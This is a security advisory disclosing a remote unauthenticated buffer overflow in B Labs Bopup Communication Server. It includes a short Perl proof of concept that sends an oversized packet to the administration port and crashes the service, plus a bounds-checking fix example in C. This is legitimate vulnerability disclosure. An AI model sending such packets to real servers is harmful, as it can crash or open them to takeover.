Trustwave SpiderLabs Security Advisory TWSL2016-020:
Buffer Overflow Vulnerability in B Labs Bopup Communication Server

Published: 11/03/2016
Version: 1.0

Vendor: B Labs (http://www.bopup.com/)
Product: Bopup Communication Server
Version affected: <= 4.5.3.13001

Product description:
Bopup Communication Server is a secure messaging suite designed to provide efficient and private communication over networks of any size. The server meets most of the critical business needs, such as centralized management, the Active Directory (LDAP) support, message and file transfer logging.

Finding 1: Remote un-authenticated buffer overflow
Credit: Neil Kettle of Trustwave

Bopup Communications Server contains a remotely exploitable buffer overflow in handling and parsing of packets to the remote administration port (19809/TCP) prior to authentication. Through this, an attacker can execute arbitrary code on the remote host with the privileges of the Bopup Communications Server, namely SYSTEM.

The issue occurs due to a lack of bounds validation in several calls to memcpy with user-definable lengths with the destination buffer allocated on the stack.

The following Proof of Concept (PoC) builds a packet which when sent to the remote service causes an access violation to occur in the processing of the packet.

## bopup-poc.pl
$buf = "\x79\xDF\x32\x01";
send(SOCKET, $buf, 0);

$buf = "\x9D\x00\x00\x00"; # op code
$buf .= "\x80\x14\x00\x00"; # total length
$buf .= "\x80\x14\x00\x00"; # smash length
$buf .= "\x00\x00\x00\x00"; # extra length
$buf .= "\x00\x00\x00\x00";
send(SOCKET, $buf, 0);

$buf = "A" x 0x1480;
send(SOCKET, $buf, 0);

Remediation Steps:
There is no official fix. However, this issue can be mitigated with the use of technologies, such as an Intrusion Prevention System (IPS). Vulnerability Scanners and Intrusion Detection Systems (IDS) may detect the presence of the vulnerability. Trustwave has added coverage for its IDS/IPS platform.
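
The missing bounds validation described under Finding 1, seen from the fix side: an added C example (not vendor or Trustwave code) that checks every wire-supplied length before the memcpy into a fixed stack buffer. The 20-byte little-endian header layout and field order follow the PoC comments; the struct, the function names, the field semantics and the 1024-byte buffer size are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HDR_LEN   20    /* five 32-bit fields, as in the PoC header */
#define FIELD_MAX 1024  /* assumed size of the fixed stack buffer */

/* Field order follows the PoC comments; the real semantics are assumed. */
struct pkt_hdr { uint32_t opcode, total_len, field_len, extra_len, reserved; };

/* Read a little-endian 32-bit value without alignment assumptions. */
static uint32_t rd32le(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parse the header. Returns 0 on success, -1 if fewer than 20 bytes arrived. */
int parse_hdr(const uint8_t *buf, size_t n, struct pkt_hdr *h) {
    if (n < HDR_LEN) return -1;
    h->opcode    = rd32le(buf);
    h->total_len = rd32le(buf + 4);
    h->field_len = rd32le(buf + 8);
    h->extra_len = rd32le(buf + 12);
    h->reserved  = rd32le(buf + 16);
    return 0;
}

/* Copy the first field only after each length is checked against the
 * destination, the declared total and the bytes actually received.
 * Returns bytes copied, or -1 when the packet must be rejected. */
int copy_field(const struct pkt_hdr *h, const uint8_t *body, size_t body_n,
               uint8_t *dst, size_t dst_cap) {
    if (h->field_len > dst_cap) return -1;       /* would overflow dst */
    if (h->field_len > h->total_len) return -1;  /* inconsistent header */
    if (h->extra_len > h->total_len - h->field_len) return -1; /* no wrap */
    if (h->total_len > body_n) return -1;        /* body truncated */
    memcpy(dst, body, h->field_len);
    return (int)h->field_len;
}

/* Handle one reassembled packet (header followed by body). */
int handle_packet(const uint8_t *pkt, size_t n) {
    uint8_t field[FIELD_MAX];  /* stack destination, as in the advisory */
    struct pkt_hdr h;
    if (parse_hdr(pkt, n, &h) != 0) return -1;
    return copy_field(&h, pkt + HDR_LEN, n - HDR_LEN, field, sizeof field);
}
```

A header that declares 0x1480 bytes for the first field, as the PoC does, is rejected by the first check in copy_field because it exceeds the destination capacity.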

Revision History:
07/14/2016 - Attempt to contact vendor
09/16/2016 - Attempt to contact vendor
10/14/2016 - Final Attempt to contact vendor
11/03/2016 - Advisory published

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.

https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.